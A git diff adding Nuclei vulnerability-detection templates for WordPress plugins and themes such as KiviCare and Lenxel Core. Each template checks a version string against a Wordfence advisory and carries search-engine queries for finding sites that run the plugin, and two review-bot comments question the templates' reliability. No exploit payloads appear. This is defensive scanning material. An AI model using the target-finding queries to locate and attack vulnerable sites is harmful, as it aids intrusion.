+++ b/poc/other/fd-elementor-button-plus-3ed7fab53de695a4fcfb576680a10315.yaml
@@ -0,0 +1,59 @@
+id: fd-elementor-button-plus-3ed7fab53de695a4fcfb576680a10315
+
+info:
+ name: >
+ Elementor Button Plus <= 1.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4f6c69ca-eb1e-445a-af72-5f03dfa07f9b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/fd-elementor-button-plus/"
+ google-query: inurl:"/wp-content/plugins/fd-elementor-button-plus/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,fd-elementor-button-plus,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fd-elementor-button-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fd-elementor-button-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.3')
\ No newline at end of file
diff --git a/poc/other/flixita-69e3979808a27506066d883a9f8eb4e6.yaml b/poc/other/flixita-69e3979808a27506066d883a9f8eb4e6.yaml
new file mode 100644
index 0000000000..8530b3b3eb
--- /dev/null
+++ b/poc/other/flixita-69e3979808a27506066d883a9f8eb4e6.yaml
@@ -0,0 +1,59 @@
+id: flixita-69e3979808a27506066d883a9f8eb4e6
+
+info:
+ name: >
+ Flixita <= 1.0.82 - Reflected Cross-Site Scripting via id Parameter
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/131b5d57-2af1-4cc5-8b4e-019a050c3bb8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/flixita/"
+ google-query: inurl:"/wp-content/themes/flixita/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,flixita,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/flixita/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "flixita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.82')
\ No newline at end of file
diff --git a/poc/other/folder-gallery-1e6185b69c7ba994a4d3f38a05160b82.yaml b/poc/other/folder-gallery-1e6185b69c7ba994a4d3f38a05160b82.yaml
new file mode 100644
index 0000000000..62e6e1dae1
--- /dev/null
+++ b/poc/other/folder-gallery-1e6185b69c7ba994a4d3f38a05160b82.yaml
@@ -0,0 +1,59 @@
+id: folder-gallery-1e6185b69c7ba994a4d3f38a05160b82
+
+info:
+ name: >
+ Folder Gallery <= 1.7.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4521959-416e-4ff5-96c0-bc4dbb0187b7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/folder-gallery/"
+ google-query: inurl:"/wp-content/plugins/folder-gallery/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,folder-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/folder-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "folder-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.4')
\ No newline at end of file
diff --git a/poc/other/friends-808e945853b70d97c7af6eefcb7afa6c.yaml b/poc/other/friends-808e945853b70d97c7af6eefcb7afa6c.yaml
new file mode 100644
index 0000000000..af414b38b7
--- /dev/null
+++ b/poc/other/friends-808e945853b70d97c7af6eefcb7afa6c.yaml
@@ -0,0 +1,59 @@
+id: friends-808e945853b70d97c7af6eefcb7afa6c
+
+info:
+ name: >
+ Friends <= 3.2.1 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/980b16d4-3c4a-4ed1-af46-f39f3ec6dd19?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/friends/"
+ google-query: inurl:"/wp-content/plugins/friends/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,friends,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/friends/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "friends"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.1')
\ No newline at end of file
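Review bot: The word matcher `- "friends"` is a common English word, so it adds almost no assurance that the body really is this plugin's readme. That matters more here than elsewhere because the template is rated `high` and follows up to three redirects before matching. Anchor the matcher on something specific to the file instead, such as the readme's `=== ... ===` title line, so that a hit depends on the plugin's own readme and not on any 200 response that happens to contain the word.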
diff --git a/poc/other/gallery-videos-3ff175744c927034ff36b2d07fcbc5d1.yaml b/poc/other/gallery-videos-3ff175744c927034ff36b2d07fcbc5d1.yaml
new file mode 100644
index 0000000000..b4fc1b0eb6
--- /dev/null
+++ b/poc/other/gallery-videos-3ff175744c927034ff36b2d07fcbc5d1.yaml
@@ -0,0 +1,59 @@
+id: gallery-videos-3ff175744c927034ff36b2d07fcbc5d1
+
+info:
+ name: >
+ YouTube Gallery and Vimeo Gallery Plugin <= 2.4.2 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5524582-5aac-48b4-ad67-7c4829d63ed0?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/gallery-videos/"
+ google-query: inurl:"/wp-content/plugins/gallery-videos/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,gallery-videos,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gallery-videos/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gallery-videos"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.2')
\ No newline at end of file
diff --git a/poc/other/gallery-videos-f2aafb7e611c06dc54124ab527015f64.yaml b/poc/other/gallery-videos-f2aafb7e611c06dc54124ab527015f64.yaml
new file mode 100644
index 0000000000..bacf48b432
--- /dev/null
+++ b/poc/other/gallery-videos-f2aafb7e611c06dc54124ab527015f64.yaml
@@ -0,0 +1,59 @@
+id: gallery-videos-f2aafb7e611c06dc54124ab527015f64
+
+info:
+ name: >
+ Video Gallery <= 2.4.1 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b57c9e58-64a6-48e8-8ef6-25608e4131e6?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/gallery-videos/"
+ google-query: inurl:"/wp-content/plugins/gallery-videos/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,gallery-videos,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gallery-videos/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gallery-videos"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.1')
\ No newline at end of file
diff --git a/poc/other/gold-addons-for-elementor-7eaebe2336e04d77baf7d72493304929.yaml b/poc/other/gold-addons-for-elementor-7eaebe2336e04d77baf7d72493304929.yaml
new file mode 100644
index 0000000000..81dde4b40c
--- /dev/null
+++ b/poc/other/gold-addons-for-elementor-7eaebe2336e04d77baf7d72493304929.yaml
@@ -0,0 +1,59 @@
+id: gold-addons-for-elementor-7eaebe2336e04d77baf7d72493304929
+
+info:
+ name: >
+ Gold Addons for Elementor <= 1.3.2 - Missing Authorization to Authenticated (Subscriber+) License Activation/Deactivation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e103afe-3ae7-413f-92b2-0e4dd9436f3e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/gold-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/gold-addons-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,gold-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gold-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gold-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.2')
\ No newline at end of file
diff --git a/poc/other/kivicare-clinic-management-system-36736e541fef2ef4d937383b3514fc1b.yaml b/poc/other/kivicare-clinic-management-system-36736e541fef2ef4d937383b3514fc1b.yaml
new file mode 100644
index 0000000000..9662b9caf8
--- /dev/null
+++ b/poc/other/kivicare-clinic-management-system-36736e541fef2ef4d937383b3514fc1b.yaml
@@ -0,0 +1,59 @@
+id: kivicare-clinic-management-system-36736e541fef2ef4d937383b3514fc1b
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53c18834-3026-4d4d-888b-add314a0e56e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
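Review bot: This template reports a `critical` unauthenticated SQL injection, but the only evidence it collects is the `Stable tag` value in `readme.txt`; no request touches the affected code. A readme can be stale, removed or blocked, so a hit means the declared version is in the affected range, not that the host is confirmed vulnerable. The empty `description` should say so, for example `Version-based detection from readme.txt; confirm the installed plugin version before acting on this finding.` The two kivicare templates that follow use the same path and the same `<= 3.6.4` bound, so one host yields three findings from a single signal and reporting should de-duplicate them.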
diff --git a/poc/other/kivicare-clinic-management-system-652da11115c2f950c640dcb31343ea31.yaml b/poc/other/kivicare-clinic-management-system-652da11115c2f950c640dcb31343ea31.yaml
new file mode 100644
index 0000000000..935872ec26
--- /dev/null
+++ b/poc/other/kivicare-clinic-management-system-652da11115c2f950c640dcb31343ea31.yaml
@@ -0,0 +1,59 @@
+id: kivicare-clinic-management-system-652da11115c2f950c640dcb31343ea31
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Authenticated (Subscriber+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/86632212-37b5-4280-8a2a-163957ad9787?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
diff --git a/poc/other/kivicare-clinic-management-system-e972e5fa7dc7eb147901d9e27c2ac74c.yaml b/poc/other/kivicare-clinic-management-system-e972e5fa7dc7eb147901d9e27c2ac74c.yaml
new file mode 100644
index 0000000000..6bda5fb01f
--- /dev/null
+++ b/poc/other/kivicare-clinic-management-system-e972e5fa7dc7eb147901d9e27c2ac74c.yaml
@@ -0,0 +1,59 @@
+id: kivicare-clinic-management-system-e972e5fa7dc7eb147901d9e27c2ac74c
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Authenticated (Doctor/Receptionist+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/30f2a3ee-7f95-478c-b3d7-c254b9472d42?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
diff --git a/poc/other/lenxel-core-4972ccccaaba94b2ac118dc56066bfe6.yaml b/poc/other/lenxel-core-4972ccccaaba94b2ac118dc56066bfe6.yaml
new file mode 100644
index 0000000000..8d5e58f602
--- /dev/null
+++ b/poc/other/lenxel-core-4972ccccaaba94b2ac118dc56066bfe6.yaml
@@ -0,0 +1,59 @@
+id: lenxel-core-4972ccccaaba94b2ac118dc56066bfe6
+
+info:
+ name: >
+ Lenxel Core <= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/48086577-09fc-4406-b13f-2091b50d1719?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/other/lenxel-core-c40309757059a7c5f5e2a082116ad730.yaml b/poc/other/lenxel-core-c40309757059a7c5f5e2a082116ad730.yaml
new file mode 100644
index 0000000000..1b6725eeb4
--- /dev/null
+++ b/poc/other/lenxel-core-c40309757059a7c5f5e2a082116ad730.yaml
@@ -0,0 +1,59 @@
+id: lenxel-core-c40309757059a7c5f5e2a082116ad730
+
+info:
+ name: >
+ Lenxel Core <= 1.1 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dac404d-369c-4036-9c64-4afab021cbe8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/other/load-more-posts-f94901beaffb62ce5c913ef672f4eb96.yaml b/poc/other/load-more-posts-f94901beaffb62ce5c913ef672f4eb96.yaml
new file mode 100644
index 0000000000..92db10483b
--- /dev/null
+++ b/poc/other/load-more-posts-f94901beaffb62ce5c913ef672f4eb96.yaml
@@ -0,0 +1,59 @@
+id: load-more-posts-f94901beaffb62ce5c913ef672f4eb96
+
+info:
+ name: >
+ Load More Posts <= 1.4.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e45dd9f6-9cc6-42d0-b03f-65fda85425f2?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/load-more-posts/"
+ google-query: inurl:"/wp-content/plugins/load-more-posts/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,load-more-posts,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/load-more-posts/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "load-more-posts"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/other/mail-picker-303b0f9000254327c2e69e892380ecb9.yaml b/poc/other/mail-picker-303b0f9000254327c2e69e892380ecb9.yaml
new file mode 100644
index 0000000000..5e338f8e9d
--- /dev/null
+++ b/poc/other/mail-picker-303b0f9000254327c2e69e892380ecb9.yaml
@@ -0,0 +1,59 @@
+id: mail-picker-303b0f9000254327c2e69e892380ecb9
+
+info:
+ name: >
+ Mail Picker <= 1.0.14 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4b4de145-bff1-4265-97bf-4085b4112a66?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mail-picker/"
+ google-query: inurl:"/wp-content/plugins/mail-picker/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mail-picker,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mail-picker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mail-picker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.14')
\ No newline at end of file
diff --git a/poc/other/meeting-scheduler-by-vcita-7c52a014cce8f41b194342f08ceede41.yaml b/poc/other/meeting-scheduler-by-vcita-7c52a014cce8f41b194342f08ceede41.yaml
new file mode 100644
index 0000000000..f727cc5bbb
--- /dev/null
+++ b/poc/other/meeting-scheduler-by-vcita-7c52a014cce8f41b194342f08ceede41.yaml
@@ -0,0 +1,59 @@
+id: meeting-scheduler-by-vcita-7c52a014cce8f41b194342f08ceede41
+
+info:
+ name: >
+ Online Booking & Scheduling Calendar for WordPress by vcita <= 4.5.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/963c2d10-692b-4447-8d0b-7ccc2e533f01?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/"
+ google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "meeting-scheduler-by-vcita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.5.1')
\ No newline at end of file
diff --git a/poc/other/mins-to-read-2941ea333622216e1c6091029b0b178a.yaml b/poc/other/mins-to-read-2941ea333622216e1c6091029b0b178a.yaml
new file mode 100644
index 0000000000..d586751fa2
--- /dev/null
+++ b/poc/other/mins-to-read-2941ea333622216e1c6091029b0b178a.yaml
@@ -0,0 +1,59 @@
+id: mins-to-read-2941ea333622216e1c6091029b0b178a
+
+info:
+ name: >
+ Mins To Read <= 1.2.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5a595e05-c017-4f6a-995d-a6226c5a19b1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mins-to-read/"
+ google-query: inurl:"/wp-content/plugins/mins-to-read/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mins-to-read,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mins-to-read/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mins-to-read"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.2')
\ No newline at end of file
diff --git a/poc/other/newsmash-6377f947dc4cbd6377b900e7b2a109af.yaml b/poc/other/newsmash-6377f947dc4cbd6377b900e7b2a109af.yaml
new file mode 100644
index 0000000000..60428d9ce2
--- /dev/null
+++ b/poc/other/newsmash-6377f947dc4cbd6377b900e7b2a109af.yaml
@@ -0,0 +1,59 @@
+id: newsmash-6377f947dc4cbd6377b900e7b2a109af
+
+info:
+ name: >
+ NewsMash <= 1.0.71 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bb30dac-e0f3-43dd-a20d-9af6c7af3cb4?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/newsmash/"
+ google-query: inurl:"/wp-content/themes/newsmash/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,newsmash,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/newsmash/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newsmash"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.71')
